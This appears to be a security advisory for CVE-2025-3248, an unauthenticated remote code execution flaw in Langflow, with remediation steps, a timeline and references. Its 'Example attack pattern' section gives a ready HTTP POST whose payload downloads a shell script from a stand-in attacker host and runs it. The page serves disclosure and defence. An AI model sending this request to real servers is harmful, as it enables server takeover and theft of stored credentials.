What is Langflow?
Langflow is an open-source Python web application that provides a visual drag-and-drop interface for building LLM-powered AI agent pipelines and chatbots using frameworks like LangChain. Developers use it to design, prototype, and deploy AI workflows connecting language models to external data sources, APIs, and tools. Langflow is widely used in enterprise AI development environments and is often deployed as an internal service — sometimes exposed to the internet for team collaboration.
The platform's core functionality involves executing user-defined Python code as part of AI pipeline components. This by-design code execution capability makes missing authentication on execution endpoints particularly dangerous.
Overview
CVE-2025-3248 is a missing authentication vulnerability (CWE-306) in Langflow's /api/v1/validate/code endpoint. The endpoint accepts arbitrary Python code and executes it server-side using Python's exec() function — without requiring any authentication. An unauthenticated remote attacker can send a crafted HTTP request with malicious Python code and achieve immediate remote code execution on the Langflow host. Fixed in version 1.3.0, but active exploitation targeting cryptominer deployment was confirmed before the CISA KEV listing.
Affected Versions
| Product | Vulnerable | Fixed |
|---|---|---|
| Langflow | < 1.3.0 | 1.3.0 |
Technical Details
The /api/v1/validate/code endpoint was designed to validate user-submitted Python component code during AI pipeline construction. The endpoint accepts a JSON body containing Python source code, passes it to Python's built-in exec() function without sandboxing or authentication, and returns the execution result.
An attacker simply sends a POST request to this endpoint with any Python code they want to execute — no credentials, no token, no session required. Because exec() runs in the context of the Langflow Python process (which may have access to environment variables, file system paths, AI API keys, and database credentials stored in the application), the impact is equivalent to full server compromise.
Example attack pattern:
POST /api/v1/validate/code HTTP/1.1
Host: <target>:7860
Content-Type: application/json
{"code": "import subprocess; subprocess.run(['curl', 'attacker.com/shell.sh', '-o', '/tmp/s']); subprocess.run(['sh', '/tmp/s'])"}
Key characteristics:
- Zero prerequisites — no account, no prior access, no user interaction
- Direct Python code execution in the server process context
- Langflow typically stores LLM API keys (OpenAI, Anthropic, etc.) in environment variables accessible via
os.environ - Often deployed with access to internal databases and services
Discovery
The vulnerability was identified and reported to the Langflow project maintainers. A fix was merged to the main branch on March 28, 2025, and released in version 1.3.0 on April 7, 2025.
Exploitation Context
Exploitation began before the CISA KEV listing on May 5, 2025. Cryptominer campaigns were the primary observed payload — attackers deployed XMRig (Monero miner) and similar cryptocurrency mining software on compromised Langflow instances, leveraging the typically high-CPU cloud infrastructure used for AI workloads.
Fortinet FortiGuard Labs documented active exploitation campaigns targeting internet-exposed Langflow deployments. The combination of easy exploitation (single POST request, no auth) and high-value targets (AI development environments with LLM API keys and cloud credentials) made Langflow an attractive target.
Shodan and Censys scans revealed hundreds to thousands of internet-exposed Langflow instances at the time of exploitation, with many running in cloud environments (AWS, GCP, Azure) where compromised credentials could enable further cloud account takeover.
Remediation
- Upgrade to Langflow 1.3.0 or later immediately. The CISA deadline was May 26, 2025.
- Do not expose Langflow to the internet — it is designed as an internal development tool. Place it behind a VPN, authentication proxy, or firewall that restricts access to authorized users only.
- Rotate all LLM API keys stored in or accessible from the Langflow environment — OpenAI, Anthropic, and similar API keys may have been exfiltrated by attackers.
- Audit cloud credentials accessible from the Langflow host environment — instance roles (IAM), environment variables, and mounted secrets.
- Check for cryptominer processes: look for unexpected CPU-intensive processes (XMRig, xmrig,
minerd), unusual outbound connections to mining pools, and crontab entries. - Review access logs for POST requests to
/api/v1/validate/codefrom unexpected IP addresses.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-3248 |
| Vendor / Product | Langflow — Langflow |
| NVD Published | 2025-04-07 |
| NVD Last Modified | 2025-11-06 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-306 find similar ↗ |
| CISA KEV Added | 2025-05-05 |
| CISA KEV Deadline | 2025-05-26 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2025-03-28 | Fix merged to Langflow main branch |
| 2025-04-07 | Langflow 1.3.0 released with fix; CVE published |
| 2025-05-05 | Added to CISA Known Exploited Vulnerabilities catalog; active exploitation in cryptominer campaigns confirmed |
| 2025-05-26 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| GitHub Security Advisory GHSA-c995-4fw3-j39m — Langflow CVE-2025-3248 | Vendor Advisory |
| NVD — CVE-2025-3248 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Fortinet — Exploitation of Langflow CVE-2025-3248 | Security Research |
| CYFIRMA — CVE-2025-3248 Technical Analysis | Security Research |